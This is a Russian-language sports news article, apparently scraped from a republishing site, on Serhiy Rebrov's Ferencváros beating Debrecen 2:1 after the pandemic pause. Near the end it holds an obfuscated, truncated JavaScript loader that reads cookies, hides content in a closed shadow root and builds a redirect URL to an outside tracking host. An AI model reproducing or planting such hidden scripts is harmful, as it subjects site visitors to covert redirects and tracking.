Он вернулся! Сергей Ребров выиграл свой первый матч за 70 дней

В дебютной официальной игре после продолжительной паузы «украинский» «Ференцварош» добыл волевую победу

После паузы, связанной с пандемией, возобновился чемпионат Венгрии по футболу. В отложенном матче стартового тура чемпион страны «Ференцварош», возглавляемый украинским тренером Сергеем Ребровым, дома одержал волевую победу над «Дебреценом» со счетом 2:1. Этот выигрыш, с учетом карантина, стал для команды Реброва первым за 70 дней.

Читайте также: "При всем уважении к Реброву": лучший теннисист Украины назвал любимого футболиста "Динамо"

Отметим, что "Дебрецен" довольно неожиданно открыл счет уже на 13-й минуте матча в Будапеште, проходившего при пустых трибунах. Однако еще до перерыва полузащитник "Ференцвароша" Сигер сделал дубль в ворота своей бывшей команды, что обеспечило подопечным Реброва важные три очка.

Реклама

Добавим, что украинец Харатин отыграл за "Ференцварош" весь матч, а еще один футболист из Украины Зубков, выступающий под руководством Реброва, в этой встрече был заменен на 60-й минуте. Оба игрока по ходу поединка получили по желтой карточке.

Благодаря этой победе «Ференцварош» закрепился на первом месте в чемпионате Венгрии, опережая «Фехервар» на 6 очков, а также имея еще один матч в запасе.

	Он вернулся! Сергей Ребров выиграл свой первый матч за 70 дней

	Он вернулся! Сергей Ребров выиграл свой первый матч за 70 дней

Реклама

	Он вернулся! Сергей Ребров выиграл свой первый матч за 70 дней

	Он вернулся! Сергей Ребров выиграл свой первый матч за 70 дней

Читайте также: "После контракта с Абрамовичем он сразу постарел": Шева и Ребров попали в рейтинг топ-разочарований

Ранее мы рассказывали, чтосын Реброва "зажег" на трибунах в Венгрии. Четырехлетний Никита в компании запасных принялся скандировать фамилию второго вратаря "Ференцвароша" и решил называть Дибушем каждого вокруг. Никто не смог сдержать улыбки.

Читайте также:  5.6 млн долларов за 30 секунд рекламы - Невероятные цены на Супербоул

Реклама

Смотрите, как "Ференцварош" Реброва играл в Лиге Европы

Все подробности в спецтеме Футбол вернулся!

	Он вернулся! Сергей Ребров выиграл свой первый матч за 70 дней

	Он вернулся! Сергей Ребров выиграл свой первый матч за 70 дней

	Он вернулся! Сергей Ребров выиграл свой первый матч за 70 дней

Подпишись на наш telegram

Только самое важное и интересное

Подписаться

Реклама

Сергей Ребров
Ференцварош
чемпионат Венгрии

Источник:

Сегодня|Спорт

Следите за нами в соцсетях

Подписывайтесь на нашу рассылку

Введите корректный email

Ок

Реклама

Новости партнеров

Загрузка…

Популярные статьи

	Он вернулся! Сергей Ребров выиграл свой первый матч за 70 днейЭпидемия коронавируса в турецком клубе: заражены девять человек, в том числе президент «Бешикташа»Футбол 	Он вернулся! Сергей Ребров выиграл свой первый матч за 70 днейФутбол вернулся! Все о первом туре Бундеслиги в эпоху жесткого карантинаФутбол 	Он вернулся! Сергей Ребров выиграл свой первый матч за 70 днейЧто творит! 17-летний вратарь «Динамо» превратился в «Неймара», выдав обалденные фокусы на пляжеФутбол 	Он вернулся! Сергей Ребров выиграл свой первый матч за 70 днейИз-за пандемии коронавируса в Германии добавили два правила к футбольным матчамФутбол 	Он вернулся! Сергей Ребров выиграл свой первый матч за 70 днейКлубы футбольной Премьер-лиги Украины сыграли секретный матч на карантинеФутбол 	Он вернулся! Сергей Ребров выиграл свой первый матч за 70 днейНазвана точная дата возобновления чемпионата Украины: «Шахтер» – «Динамо» и другие матчи пройдут без зрителейФутбол

Новости партнеров

Загрузка…

загрузка…

	Он вернулся! Сергей Ребров выиграл свой первый матч за 70 дней

Наши соцсети

  • Facebook

  • Telegram

  • Youtube

  • Instagram

Связаться с нами

  • Контакты редакции

  • Написать нам

  • Реклама на сайте

  • Спецпроекты

  • Архив сайта

Политика сайта

  • Правила цитирования

  • Правила комментирования

  • Конфиденциальность и защита персональных данных

Стоковые фотографии от

© segodnya.ua, 2020

Главное

Лента новостей

Отсутствует подключение к сети Интернет
.
.
.
.

if(document.documentElement.clientWidth > 1199) {
(function(){(function(l,d,A){«use strict»;var t,o,e,i,z,r,n,S,T,a,c,f,s,p,h,u,b,D,k,v,g,x,m,E,y,M,C,O,L,N,w,_,H,I,R,q,P,$,j,F,J=300,W=»/z»,X=»0x04″,B=»http»,G=»substr»,K=»host»,Q=J,U=»argon_»+»debug»+»=1″,V=»prototype»,Y=»createElement»,Z=»appendChild»,tt=»setTimeout»,ot=»querySelectorAll»,et=»getOwnPropertyDescriptor»,rt=»Object»,nt=»charCodeAt»,it=»fromCharCode»,at=»zmctrack»+».net»,ct=»bind»,ft=»call»,lt=»script»,dt=»head»,st=»get»,pt=»set»,ht=»indexOf»,ut=»s.»+at,bt=»cookie»,kt=»XMLHttpRequest»,vt=»Date»,gt=»now»,xt=»responseText»,mt=»open»,yt=»ShadowRoot»,wt=»Node»,At=»send»,zt=»Array»,St=»addEventListener»,Tt=B+»://»+»click»+».»+at+»/c/»+»redirect»+»?»+»hash»+»=»,Dt=»slot»,Et=»Math»,Mt=»floor»,Ct=»random»,Ot=»console»,Lt=»Document»,Nt=»innerHTML»,_t=»attachShadow»,Ht=»offsetWidth»,It=»Element»,Rt=»next»,qt=»previous»,Pt=»push»,$t=»length»,jt=»shift»,Ft=»parentNode»,Jt=»textContent»,Wt=»JSON»,Xt=»parse»,Bt=»load»,Gt=»HTML»+It,Kt=»error»,Qt=»location»,Ut=»href»,Vt=»POST»,Yt=»document»,Zt=»un»+»eval»,to={},oo=»parseInt»,eo=It+»Sibling»,ro=»String»,no=»split»;to[«mode»]=»closed»,t=l[Yt],o=l[«chrome»],e=!0,i=0;try{e=!!l[Zt]}catch(t){}function io(t,o){return q[ft](t,o||»|»)}!o&&!e||(z=l[«n10091125»],r=z[Yt],n=z[rt][et],S=r[ot][ct](t),T=z[tt][ct](l),a=n(z[Lt][V],dt)[st][ft](t),c=r[Y][ct](t),f=r[dt][Z][ct](a),s=z[vt][gt],p=-1Q?i++

По материалам: Сегодня

Евгений Радченко

Добавить комментарий

Next Post

Убийство депутата: шокирующие подробности трагедии (фото)

Сб Май 23 , 2020
Тело народного депутата Валерия Давиденко с огнестрельным ранением, нашла уборщица. Евгений Радченко See author's posts